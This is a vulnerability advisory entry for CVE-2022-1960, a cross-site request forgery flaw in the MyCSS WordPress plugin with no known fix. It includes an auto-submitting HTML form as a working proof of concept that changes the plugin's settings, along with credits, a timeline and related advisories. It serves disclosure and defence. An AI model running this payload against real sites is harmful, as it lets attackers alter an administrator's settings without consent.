MyCSS <= 1.1 – Arbitrary Settings Update via CSRF | CVE 2022-1960 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/themes.php?page=mycss.php" method="POST">
    <input type="text" name="newcontent" value="">
    <input type="text" name="info_update" value="Update CSS">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

bc97dd57-e9f6-4bc3-a4c2-40303786ae4a

Timeline

Publicly Published

2022-06-06 (about 1 years ago)

Added

2022-06-06 (about 1 years ago)

Last Updated

2023-03-09 (about 1 years ago)

Other

Published

Title

Published

2023-04-07

Title

Simple Job Board < 2.10.4 - Settings Update via CSRF

Published

2023-11-28

Title

WooCommerce Login Redirect <= 2.2.4 - Cross-Site Request Forgery

Published

2024-03-29

Title

Popup Cart Lite for WooCommerce <= 1.1 - Cross-Site Request Forgery

Published

2014-08-01

Title

LiveOptim 1.1.3 - Configuration Setting Manipulation CSRF

Published

2023-10-03

Title

Contact Form by Supsystic <= 1.7.28 - CSRF